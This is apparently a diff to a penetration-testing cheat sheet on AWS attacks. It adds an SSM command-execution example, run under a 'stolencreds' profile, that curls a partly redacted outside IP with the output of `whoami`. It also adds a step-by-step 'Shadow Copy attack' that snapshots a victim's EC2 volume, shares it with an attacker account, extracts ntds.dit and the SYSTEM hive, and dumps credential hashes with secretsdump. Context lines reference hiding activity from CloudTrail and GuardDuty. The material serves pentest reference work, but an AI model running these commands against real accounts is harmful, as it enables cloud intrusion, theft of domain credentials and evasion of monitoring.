AWS SSM + Shadow copy attack

Methodology and Resources/Cloud - AWS Pentest.md

@@ -18,6 +18,7 @@
 * [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
 * [AWS - SSM - Command execution](#aws---ssm---command-execution)
 * [AWS - Golden SAML Attack](#aws---golden-saml-attack)
+* [AWS - Shadow Copy Attack](#aws---shadow-copy-attack)
 * [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
   * [PenTest:IAMUser/KaliLinux](#)
   * [PenTest:IAMUser/ParrotLinux](#)
@@ -394,10 +395,24 @@ $ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
 
 ## AWS - SSM - Command execution
 
+:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.
+
+SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):
+* Windows Server 2008-2012 R2 AMIs published in November 2016 or later
+* Windows Server 2016 and 2019
+* Amazon Linux
+* Amazon Linux 2
+* Ubuntu Server 16.04
+* Ubuntu Server 18.04
+* Amazon ECS-Optimized
+
 ```powershell
 $ aws ssm describe-instance-information --profile stolencreds --region eu-west-1  
 $ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
 $ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
+
+e.g:
+$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
 ```
 
 ## AWS - Golden SAML Attack
@@ -419,6 +434,28 @@ $ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file
 -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012
 ```
 
+## AWS - Shadow Copy attack
+
+Prerequisite:
+* EC2:CreateSnapshot
+* CloudCopy - https://github.com/Static-Flow/CloudCopy
+
+1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions
+2. Run `"Describe-Instances"` and show in list for attacker to select
+3. Run `"Create-Snapshot"` on volume of selected instance
+4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account
+5. Load AWS CLI with Attacker Credentials
+6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot
+7. Ssh run `"sudo mkdir /windows"`
+8. Ssh run `"sudo mount /dev/xvdf1 /windows/"`
+9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"`
+10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"`
+11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"`
+12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"`
+13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"`
+14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
+
+
 ## Cover tracks by obfuscating Cloudtrail logs and Guard Duty
 
 :warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.